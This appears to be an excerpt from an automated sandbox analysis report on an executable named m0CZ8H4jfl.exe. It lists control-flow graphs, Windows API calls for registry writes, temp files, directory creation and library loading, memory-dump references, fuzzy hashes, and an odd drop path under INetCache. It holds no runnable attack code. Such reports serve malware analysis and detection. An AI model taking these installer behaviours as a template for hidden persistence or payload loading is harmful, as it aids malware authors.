                                                                                                          control_flow_graph 692 403027-40303e 693 403040 692->693 694 403047-403050 692->694 693->694 695 403052 694->695 696 403059-40305e 694->696 695->696 697 403060-403069 call 403258 696->697 698 40306e-40307b call 403242 696->698 697->698 702 403230 698->702 703 403081-403085 698->703 704 403232-403233 702->704 705 4031db-4031dd 703->705 706 40308b-4030d4 GetTickCount 703->706 707 40323b-40323f 704->707 710 40321d-403220 705->710 711 4031df-4031e2 705->711 708 403238 706->708 709 4030da-4030e2 706->709 708->707 712 4030e4 709->712 713 4030e7-4030f5 call 403242 709->713 714 403222 710->714 715 403225-40322e call 403242 710->715 711->708 716 4031e4 711->716 712->713 713->702 725 4030fb-403104 713->725 714->715 715->702 726 403235 715->726 717 4031e7-4031ed 716->717 720 4031f1-4031ff call 403242 717->720 721 4031ef 717->721 720->702 729 403201-40320d call 405cdc 720->729 721->720 728 40310a-40312a call 40654a 725->728 726->708 734 403130-403143 GetTickCount 728->734 735 4031d3-4031d5 728->735 736 4031d7-4031d9 729->736 737 40320f-403219 729->737 738 403145-40314d 734->738 739 40318e-403190 734->739 735->704 736->704 737->717 742 40321b 737->742 743 403155-40318b MulDiv wsprintfW call 4051b4 738->743 744 40314f-403153 738->744 740 403192-403196 739->740 741 4031c7-4031cb 739->741 745 403198-40319f call 405cdc 740->745 746 4031ad-4031b8 740->746 741->709 747 4031d1 741->747 742->708 743->739 744->739 744->743 752 4031a4-4031a6 745->752 750 4031bb-4031bf 746->750 747->708 750->728 753 4031c5 750->753 752->736 754 4031a8-4031ab 752->754 753->708 754->750
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountTick$wsprintf
                                                                                                          • String ID: jA$ jA$... %d%%
                                                                                                          • API String ID: 551687249-2167919867
                                                                                                          • Opcode ID: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                          • Instruction ID: 9abceb1f43df10d1a821086e1d45a58eca4464abfa5f2a46825b956852eb5d51
                                                                                                          • Opcode Fuzzy Hash: d6d85bbee09884fc6a4e27a5c727532f93391e72c67541d57332e7913648c049
                                                                                                          • Instruction Fuzzy Hash: AF517C71901259EBDB10CF65DA44BAE7BB8AF05766F10417FF811B62C0C7789E40CBAA

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 755 4025e5-4025fa call 402ba2 758 402600-402607 755->758 759 402a4c-402a4f 755->759 761 402609 758->761 762 40260c-40260f 758->762 760 402a55-402a5b 759->760 761->762 764 402773-40277b 762->764 765 402615-402624 call 405fb5 762->765 764->759 765->764 768 40262a 765->768 769 402630-402634 768->769 770 4026c9-4026cc 769->770 771 40263a-402655 ReadFile 769->771 773 4026e4-4026f4 call 405cad 770->773 774 4026ce-4026d1 770->774 771->764 772 40265b-402660 771->772 772->764 775 402666-402674 772->775 773->764 782 4026f6 773->782 774->773 776 4026d3-4026de call 405d0b 774->776 779 40267a-40268c MultiByteToWideChar 775->779 780 40272f-40273b call 405f9c 775->780 776->764 776->773 779->782 783 40268e-402691 779->783 780->760 786 4026f9-4026fc 782->786 787 402693-40269e 783->787 786->780 789 4026fe-402703 786->789 787->786 790 4026a0-4026c5 SetFilePointer MultiByteToWideChar 787->790 791 402740-402744 789->791 792 402705-40270a 789->792 790->787 793 4026c7 790->793 795 402761-40276d SetFilePointer 791->795 796 402746-40274a 791->796 792->791 794 40270c-40271f 792->794 793->782 794->764 797 402721-402727 794->797 795->764 798 402752-40275f 796->798 799 40274c-402750 796->799 797->769 800 40272d 797->800 798->764 799->795 799->798 800->764
                                                                                                          APIs
                                                                                                          • ReadFile.KERNELBASE(?,?,?,?), ref: 0040264D
                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,?,?,00000001), ref: 00402688
                                                                                                          • SetFilePointer.KERNELBASE(?,?,?,00000001,?,?,?,?,?,00000001), ref: 004026AB
                                                                                                          • MultiByteToWideChar.KERNEL32(?,?,?,00000000,?,00000001,?,00000001,?,?,?,?,?,00000001), ref: 004026C1
                                                                                                            • Part of subcall function 00405D0B: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405D21
                                                                                                          • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                                                          • String ID: 9
                                                                                                          • API String ID: 163830602-2366072709
                                                                                                          • Opcode ID: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                          • Instruction ID: c11c119823ef092d14edb4d445d1eebecf1e4ba29e3308019af08aa6c5ad61e3
                                                                                                          • Opcode Fuzzy Hash: 1e0cadf04f88ccade5697334c954c2e9868fb264b6ac47f65209ed57e79425ed
                                                                                                          • Instruction Fuzzy Hash: 43510874D00219AADF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99D42DB69

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 801 40237b-4023c1 call 402cb4 call 402bbf * 2 RegCreateKeyExW 808 4023c7-4023cf 801->808 809 402a4c-402a5b 801->809 810 4023d1-4023de call 402bbf lstrlenW 808->810 811 4023e2-4023e5 808->811 810->811 814 4023f5-4023f8 811->814 815 4023e7-4023f4 call 402ba2 811->815 819 402409-40241d RegSetValueExW 814->819 820 4023fa-402404 call 403027 814->820 815->814 823 402422-4024fc RegCloseKey 819->823 824 40241f 819->824 820->819 823->809 826 40281e-402825 823->826 824->823 826->809
                                                                                                          APIs
                                                                                                          • RegCreateKeyExW.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B9
                                                                                                          • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004023D9
                                                                                                          • RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402415
                                                                                                          • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateValuelstrlen
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\nsw2CAB.tmp
                                                                                                          • API String ID: 1356686001-1971207112
                                                                                                          • Opcode ID: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                          • Instruction ID: e0a93677b1043ce4e8fea40acd1fa81b7363c56b112b112c42ce1ea238d19e9d
                                                                                                          • Opcode Fuzzy Hash: 16ccbc1a4839035df8dee6c69b1955b51d84c24cc9eb413e0f302de5cc057626
                                                                                                          • Instruction Fuzzy Hash: 87118E71A00108BFEB10AFA5DE89EAEB67DEB44358F11403AF904B61D1D7B85E409668

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 827 405683-4056ce CreateDirectoryW 828 4056d0-4056d2 827->828 829 4056d4-4056e1 GetLastError 827->829 830 4056fb-4056fd 828->830 829->830 831 4056e3-4056f7 SetFileSecurityW 829->831 831->828 832 4056f9 GetLastError 831->832 832->830
                                                                                                          APIs
                                                                                                          • CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                          • GetLastError.KERNEL32 ref: 004056DA
                                                                                                          • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 004056EF
                                                                                                          • GetLastError.KERNEL32 ref: 004056F9
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 004056A9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                          • API String ID: 3449924974-297319885
                                                                                                          • Opcode ID: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                          • Instruction ID: b9d54522e8c2a6a11acfe34e4faeeda892d25e5cd719c7a25251d408d6c76708
                                                                                                          • Opcode Fuzzy Hash: 9e16c060b6dacf19867b3a219a4d1c108d16143e5081b661a232c151e35074dd
                                                                                                          • Instruction Fuzzy Hash: C8011A71D00619DBDF009FA0CA487EFBBB8EF14315F50443AD549B6190E7799604CFA9

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 833 10001759-10001795 call 10001b18 837 100018a6-100018a8 833->837 838 1000179b-1000179f 833->838 839 100017a1-100017a7 call 10002286 838->839 840 100017a8-100017b5 call 100022d0 838->840 839->840 845 100017e5-100017ec 840->845 846 100017b7-100017bc 840->846 847 1000180c-10001810 845->847 848 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 845->848 849 100017d7-100017da 846->849 850 100017be-100017bf 846->850 855 10001812-1000184c call 100015b4 call 100024a9 847->855 856 1000184e-10001854 call 100024a9 847->856 872 10001855-10001859 848->872 849->845 851 100017dc-100017dd call 10002b5f 849->851 853 100017c1-100017c2 850->853 854 100017c7-100017c8 call 100028a4 850->854 864 100017e2 851->864 860 100017c4-100017c5 853->860 861 100017cf-100017d5 call 10002645 853->861 867 100017cd 854->867 855->872 856->872 860->845 860->854 871 100017e4 861->871 864->871 867->864 871->845 876 10001896-1000189d 872->876 877 1000185b-10001869 call 1000246c 872->877 876->837 879 1000189f-100018a0 GlobalFree 876->879 883 10001881-10001888 877->883 884 1000186b-1000186e 877->884 879->837 883->876 886 1000188a-10001895 call 1000153d 883->886 884->883 885 10001870-10001878 884->885 885->883 887 1000187a-1000187b FreeLibrary 885->887 886->876 887->883
                                                                                                          APIs
                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(?,00001020), ref: 100022B8
                                                                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(?,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1797544878.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1797527224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797584618.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1797605819.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                                                                          • String ID:
                                                                                                          • API String ID: 1791698881-3916222277
                                                                                                          • Opcode ID: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                          • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                                                                          • Opcode Fuzzy Hash: 3820d06b2144ad54ebddf171c2200ffff0f7cb9118403e7eb0aa07fa6a87fa13
                                                                                                          • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 890 405c59-405c65 891 405c66-405c9a GetTickCount GetTempFileNameW 890->891 892 405ca9-405cab 891->892 893 405c9c-405c9e 891->893 895 405ca3-405ca6 892->895 893->891 894 405ca0 893->894 894->895
                                                                                                          APIs
                                                                                                          • GetTickCount.KERNEL32 ref: 00405C77
                                                                                                          • GetTempFileNameW.KERNELBASE(0040A300,?,00000000,?,?,?,00000000,0040329E,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004034CC), ref: 00405C92
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CountFileNameTempTick
                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                          • API String ID: 1716503409-2113348990
                                                                                                          • Opcode ID: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                          • Instruction ID: f587d7e23cd8e79aba5dfcc9fd1c49406dd64d8aef4a88ed345cfe548f7336ea
                                                                                                          • Opcode Fuzzy Hash: cb5392dd6a621c673a260bf01be68eb44352edb4da8eb2a8f5e3bee52ca40139
                                                                                                          • Instruction Fuzzy Hash: BAF06D76A00708BFEB008B59ED05A9FBBA8EB91750F10403AE900F7180E6B49A548B68

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 896 4063bf-4063df GetSystemDirectoryW 897 4063e1 896->897 898 4063e3-4063e5 896->898 897->898 899 4063f6-4063f8 898->899 900 4063e7-4063f0 898->900 902 4063f9-406428 wsprintfW LoadLibraryW 899->902 900->899 901 4063f2-4063f4 900->901 901->902
                                                                                                          APIs
                                                                                                          • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004063D6
                                                                                                          • wsprintfW.USER32 ref: 00406411
                                                                                                          • LoadLibraryW.KERNELBASE(?), ref: 00406421
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                                          • String ID: %s%S.dll
                                                                                                          • API String ID: 2200240437-2744773210
                                                                                                          • Opcode ID: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                          • Instruction ID: 897e15d25a7328917349fb3201836a7725472686ce540cc24b04093dc9f4d60a
                                                                                                          • Opcode Fuzzy Hash: ebb0f172caec6dc837d07c814eb63f6b49a53cdbd21dad16a8e1c45d76cddad1
                                                                                                          • Instruction Fuzzy Hash: 81F0BB7051011997DB14AB68EE4DE9B366CEB00305F11447E9946F20D1EB7CDA69CBE8
                                                                                                          APIs
                                                                                                            • Part of subcall function 00405AB4: CharNextW.USER32(?,?,0042FA70,0040A300,00405B28,0042FA70,0042FA70,76F93420,?,C:\Users\user\AppData\Local\Temp\,00405866,?,76F93420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\m0CZ8H4jfl.exe"), ref: 00405AC2
                                                                                                            • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405AC7
                                                                                                            • Part of subcall function 00405AB4: CharNextW.USER32(00000000), ref: 00405ADF
                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00000000,?,00000000,?), ref: 00401612
                                                                                                            • Part of subcall function 00405683: CreateDirectoryW.KERNELBASE(?,0040A300,C:\Users\user\AppData\Local\Temp\), ref: 004056C6
                                                                                                          • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving,?,00000000,?), ref: 00401645
                                                                                                          Strings
                                                                                                          • C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving, xrefs: 00401638
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                          • String ID: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\rapiditetens\fremtving
                                                                                                          • API String ID: 1892508949-4023340444
                                                                                                          • Opcode ID: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                          • Instruction ID: 2a65e9898054e9c842dee46b5c7982ab048171bb6952f998b4aca48d6bd22bb3
                                                                                                          • Opcode Fuzzy Hash: 52ccde5ccace11c1ffa7f9329ea0f8b807946ffbe1ca103446376b1a06abf216
                                                                                                          • Instruction Fuzzy Hash: 96119331504504EBCF20BFA4CD4599E36A1EF44368B25093BEA46B62F2DA394A819E5D
                                                                                                          APIs
                                                                                                          • IsWindowVisible.USER32(?), ref: 00405157
                                                                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051A8
                                                                                                            • Part of subcall function 00404165: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404177
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792968738.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_m0CZ8H4jfl.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Window$CallMessageProcSendVisible
                                                                                                          • String ID:
                                                                                                          • API String ID: 3748168415-3916222277
                                                                                                          • Opcode ID: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                          • Instruction ID: 0347cf6c5ba133ca8876b90c0990050b6d60b288702db1d6ba02f1018bbb4e5f
                                                                                                          • Opcode Fuzzy Hash: 2462b0bd117cba3fac64a39f9691424f836373fd1b16367001445a14a5683044
                                                                                                          • Instruction Fuzzy Hash: 4C017C71A00609ABDF214F51DD80FAB3B26EB84754F104036FA047E1E1C77A8C92DE69
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNELBASE(00000000,00000001,?), ref: 00401FEE
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000,?), ref: 004051EC
                                                                                                            • Part of subcall function 004051B4: lstrlenW.KERNEL32(0040318B,0042C248,00000000,0041D820,76F923A0,?,?,?,?,?,?,?,?,?,0040318B,00000000), ref: 004051FC
                                                                                                            • Part of subcall function 004051B4: lstrcatW.KERNEL32(0042C248,0040318B,0040318B,0042C248,00000000,0041D820,76F923A0), ref: 0040520F
                                                                                                            • Part of subcall function 004051B4: SetWindowTextW.USER32(0042C248,0042C248), ref: 00405221
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405247
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405261
                                                                                                            • Part of subcall function 004051B4: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040526F
                                                                                                          • LoadLibraryExW.KERNEL32(00000000,?,?,00000001,?), ref: 00401FFF
                                                                                                          • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,?,00000001,?), ref: 0040207C
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.1792847303.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.1792833148.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792861424.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.1792878497.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
